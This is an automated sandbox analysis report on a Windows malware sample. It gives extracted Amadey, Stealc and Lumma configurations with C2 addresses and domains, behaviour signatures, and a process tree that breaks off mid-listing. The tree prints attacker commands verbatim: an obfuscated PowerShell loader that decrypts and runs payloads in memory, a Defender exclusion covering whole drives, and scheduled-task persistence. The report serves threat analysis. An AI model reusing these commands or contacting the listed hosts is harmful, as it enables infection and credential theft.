Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 08:48

General

  • Target

    2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe

  • Size

    1.8MB

  • MD5

    7f0a76732977427371079aac4e055a2e

  • SHA1

    c799adbb85ecde3ed6c2cb17c77ee989d73cc9d6

  • SHA256

    2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc

  • SHA512

    88ed5cac47d9765cde1e83e489e4f7707176fb167318343e8c58611d4fd315de77125866d79a63ef5400f8a0b51048a0ce77298874bf1b62c3bc34f110761b05

  • SSDEEP

    49152:SRom2bAxlKp9HksGRtTvd/oheTzY0/oWnWNm4jDAATj:iom2WlKppG3vt5o4D4jDj

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://drive-connect.cyou

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 36 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 34 IoCs
  • Identifies Wine through registry keys 2 TTPs 17 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 39 IoCs
  • Suspicious use of SendNotifyMessage 33 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
      PID:796
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:904
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:948
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:516
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
            1⤵
              PID:868
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:920
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1044
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1052
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1132
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4700
                      • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                        C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4568
                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                        C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                        2⤵
                          PID:4692
                        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                          C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5084
                          • C:\Windows\explorer.exe
                            explorer.exe
                            3⤵
                            • Suspicious use of FindShellTrayWindow
                            PID:1444
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                            3⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            PID:3572
                            • C:\Windows\system32\PING.EXE
                              "C:\Windows\system32\PING.EXE" 127.1.0.1
                              4⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:5888
                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                          C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:4404
                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1376
                        • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                          C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                          2⤵
                            PID:1860
                          • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                            C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:348
                            • C:\Windows\explorer.exe
                              explorer.exe
                              3⤵
                                PID:4964
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                3⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                PID:4704
                                • C:\Windows\system32\PING.EXE
                                  "C:\Windows\system32\PING.EXE" 127.1.0.1
                                  4⤵
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  • Runs ping.exe
                                  PID:2108
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6016
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1208
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1244
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                  PID:1272
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1336
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2492
                                        • C:\Windows\SysWOW64\svchost.exe
                                          "C:\Windows\System32\svchost.exe"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2880
                                        • C:\Windows\SysWOW64\svchost.exe
                                          "C:\Windows\System32\svchost.exe"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:6072
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1364
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1384
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          1⤵
                                            PID:1428
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1556
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1616
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1656
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1688
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1768
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1776
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1892
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1952
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1964
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:2016
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2140
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                  1⤵
                                                                    PID:2164
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    1⤵
                                                                      PID:2212
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                        PID:2292
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2532
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2624
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                            1⤵
                                                                              PID:2632
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                              1⤵
                                                                                PID:2780
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                  PID:2840
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2892
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2912
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:2648
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3428
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                            PID:3436
                                                                                            • C:\Users\Admin\AppData\Local\Temp\2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe"
                                                                                              2⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks computer location settings
                                                                                              • Identifies Wine through registry keys
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4512
                                                                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                3⤵
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3176
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2736
                                                                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                                                                    attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                                                    5⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:4052
                                                                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                                                                    attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                                                    5⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:4548
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
                                                                                                    5⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2184
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell ping 127.0.0.1; del DU1zDwm.exe
                                                                                                    5⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4480
                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                      "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                      6⤵
                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                      • Runs ping.exe
                                                                                                      PID:1088
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3212
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-HNV6R.tmp\stories.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-HNV6R.tmp\stories.tmp" /SL5="$C0222,3307684,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4436
                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                      "C:\Windows\system32\net.exe" pause video_jet_1232
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:628
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 pause video_jet_1232
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1944
                                                                                                    • C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe
                                                                                                      "C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe" -i
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1904
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
                                                                                                  4⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2032
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2012
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:216
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1104
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3216
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3832
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4964
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2612
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3268
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
